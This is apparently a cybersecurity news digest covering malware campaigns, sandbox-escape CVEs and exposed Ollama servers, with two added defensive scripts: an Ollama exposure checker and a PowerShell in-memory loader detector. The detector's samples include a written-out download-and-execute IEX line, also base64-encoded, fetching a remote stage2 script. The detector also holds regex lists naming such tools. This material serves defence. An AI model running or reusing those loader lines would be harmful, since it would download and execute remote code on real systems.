News
-
Google disrupts IPIDEA residential proxy network linked to malware
Google Threat Intelligence Group disrupted IPIDEA this week, taking down domains and infrastructure tied to a residential proxy network advertised to 6.7 million users. The action targeted trojanized apps and embedded SDKs that enrolled users' devices as proxy nodes.
-
Investigation finds 175,000 publicly accessible Ollama hosts across 130 countries
A SentinelOne Labs analysis found 175,000 publicly accessible Ollama hosts across 130 countries. Many expose tool-calling capabilities and run outside the guardrails of managed LLM platforms, raising governance and security concerns for edge LLM deployments.
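A quick exposure check a defender can run against their own address space, as an added example that is not from the SentinelOne analysis. It relies on Ollama's unauthenticated `GET /api/tags` endpoint on the default port 11434: an instance that answers it with a model list from the internet is exactly the kind of host the report counts. The host list and the sample response body are constructed.

```python
"""Audit hosts for an unauthenticated Ollama API (default port 11434).

Added example, not from the SentinelOne report. Ollama ships without
authentication; if GET /api/tags returns a model list to the public
internet, anyone can pull, run and tool-call those models.
"""
import json
import socket
import urllib.error
import urllib.request

OLLAMA_PORT = 11434        # Ollama's default listening port
TIMEOUT_SECONDS = 3

# Constructed sample of what an open instance returns for GET /api/tags.
SAMPLE_TAGS_BODY = json.dumps({
    "models": [
        {"name": "llama3.1:8b", "size": 4661224676},
        {"name": "qwen2.5:7b", "size": 4683087332},
    ]
})


def classify_ollama_response(status, body):
    """Return the model names if (status, body) looks like an open Ollama
    /api/tags reply, else None. Non-200, non-JSON, or JSON without a
    'models' list (e.g. a reverse proxy's login page) counts as not exposed."""
    if status != 200:
        return None
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return None
    if not isinstance(data, dict) or not isinstance(data.get("models"), list):
        return None
    return [m["name"] for m in data["models"] if isinstance(m, dict) and "name" in m]


def fetch_tags(host, port=OLLAMA_PORT, timeout=TIMEOUT_SECONDS):
    """GET http://host:port/api/tags and return (status, body). Network errors
    and timeouts become (None, '') so one dead host does not abort the scan."""
    url = f"http://{host}:{port}/api/tags"
    req = urllib.request.Request(url, headers={"User-Agent": "ollama-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""
    except (urllib.error.URLError, socket.timeout, OSError):
        return None, ""


def audit(hosts, fetch=fetch_tags):
    """Probe each host; returns {host: {"exposed": bool, "models": [...]}}.
    `fetch` is injectable so the classification can be exercised offline."""
    report = {}
    for host in hosts:
        status, body = fetch(host)
        models = classify_ollama_response(status, body)
        report[host] = {"exposed": models is not None, "models": models or []}
    return report


if __name__ == "__main__":
    # Constructed target list; replace with your own externally routable ranges.
    targets = ["127.0.0.1"]
    for host, result in audit(targets).items():
        state = "EXPOSED" if result["exposed"] else "closed/filtered"
        print(f"{host}:{OLLAMA_PORT} {state} {result['models']}")
```

Run it only against addresses you are authorized to scan. A hit means the API is reachable without credentials; the remediation is to bind Ollama to localhost or put an authenticating reverse proxy in front of it, not to rely on obscurity of the port.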
-
NIST center issues RFI seeking input on security for autonomous AI agents
A Request for Information issued on Jan. 8 by NIST's Center for AI Standards and Innovation (CAISI) asked for input on secure practices for autonomous AI agents, focusing on novel risks, assessment methods and deployment constraints as agencies push toward operational standards.
-
TA584 adopts Tsundere Bot and XWorm in expanded initial access campaign
TA584 is using Tsundere Bot and XWorm in phishing campaigns whose volume tripled in late 2025. The infection chain uses geofenced URLs, traffic-redirect systems, CAPTCHA gates and in-memory PowerShell loaders, each of which complicates detection.
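Detection logic for the last stage of that chain, as an added example that is not from the TA584 reporting: it scores PowerShell script-block text (Windows Event ID 4104, Script Block Logging) against generic in-memory loader indicators such as download-then-IEX, reflective assembly loading and encoded commands, and decodes a `-EncodedCommand` argument so hidden indicators still count. The indicator patterns, the threshold and the sample records are assumptions, not TA584 signatures.

```python
"""Flag PowerShell script blocks that look like in-memory loaders.

Added example, not from the TA584 report: the indicators are generic
'download-and-execute in memory' patterns, not the campaign's signatures.
Input is script text as logged by Windows Event ID 4104; the sample
records at the bottom are constructed.
"""
import base64
import re

INDICATORS = [
    ("remote_fetch",     re.compile(r"DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod", re.I)),
    ("inline_eval",      re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("base64_decode",    re.compile(r"FromBase64String", re.I)),
    ("reflective_load",  re.compile(r"Reflection\.Assembly\]::Load", re.I)),
    ("encoded_cmd",      re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s", re.I)),
    ("hidden_noprofile", re.compile(r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden", re.I)),
]
# The base64 blob following -e/-ec/-enc/-EncodedCommand.
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(text):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE),
    or None if there is none or it does not decode cleanly."""
    m = ENC_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # bad padding, non-alphabet chars, odd byte count
        return None


def score_block(text, depth=1):
    """List the indicator names that fire on `text`. An encoded command is
    decoded and scored once more; those hits are prefixed 'decoded:' so the
    analyst can see the loader was wrapped."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    inner = decode_encoded_command(text) if depth > 0 else None
    if inner:
        hits += ["decoded:" + h for h in score_block(inner, depth - 1)]
    return hits


def scan(blocks, threshold=2):
    """blocks: iterable of (record_id, script_text). Returns the records whose
    indicator count reaches `threshold`. A lone IEX or DownloadString is common
    in admin tooling; two or more together is what a stager looks like."""
    flagged = []
    for rid, text in blocks:
        hits = score_block(text)
        if len(hits) >= threshold:
            flagged.append((rid, hits))
    return flagged


# Constructed sample records; the encoded payload is built here so it decodes.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage2.ps1')"
_ENC = base64.b64encode(_STAGE2.encode("utf-16le")).decode("ascii")
SAMPLE_BLOCKS = [
    ("1", r"Get-ChildItem C:\Users\alice\Documents | Measure-Object"),
    ("2", _STAGE2),
    ("3", "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)) | Out-Null"),
    ("4", "powershell -nop -w hidden -enc " + _ENC),
]

if __name__ == "__main__":
    for rid, hits in scan(SAMPLE_BLOCKS):
        print(f"record {rid}: {', '.join(hits)}")
```

The threshold exists because single indicators are noisy in real estates (deployment scripts download and IEX all day); tune it against your own baseline, and feed the decoded plaintext into the same scoring so an attacker gains nothing from `-EncodedCommand` alone.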
-
eScan update server breached to deliver malicious update on January 20, 2026
An eScan update server was breached on January 20, 2026 and pushed a malicious update to a subset of customers. Morphisec's security bulletin details the modified updater and the final backdoor payload.
-
Critical vm2 sandbox escape CVE-2026-22709 allows arbitrary code execution
A critical sandbox escape in the vm2 Node.js library, tracked as CVE-2026-22709 and rated CVSS 9.8, lets code running inside the sandbox execute on the host. Users should update to vm2 3.10.3 or later.
-
Two n8n sandbox escape flaws allow remote code execution
JFrog Security Research disclosed two eval-injection flaws in n8n that bypass its sandboxes and allow remote code execution; one is rated CVSS 9.9. Users of affected versions should update.
-
Mustang Panda deploys updated COOLCLIENT backdoor to steal endpoint data
An updated COOLCLIENT backdoor linked to Mustang Panda was used in 2025 to steal keystrokes, browser credentials and files from government endpoints across Myanmar, Mongolia, Malaysia and Russia, according to a technical analysis by Kaspersky.
-
Cellbreak Pyodide sandbox escape in Grist-Core allows remote code execution
A Pyodide sandbox escape in Grist-Core, tracked as CVE-2026-24002, lets sandboxed Python execute JavaScript in the host runtime, enabling remote code execution. The flaw was fixed in version 1.7.9 on January 9, 2026. Update, or switch the sandbox flavor to gvisor.
-
PeckBirdy JScript framework used by China-aligned actors to target gambling and government sites
A JScript command-and-control framework called PeckBirdy has been used since 2023 to compromise gambling sites and government and private-sector organizations in Asia. It runs through web browsers and other common binaries and delivers modular backdoors including HOLODONUT and MKDOOR.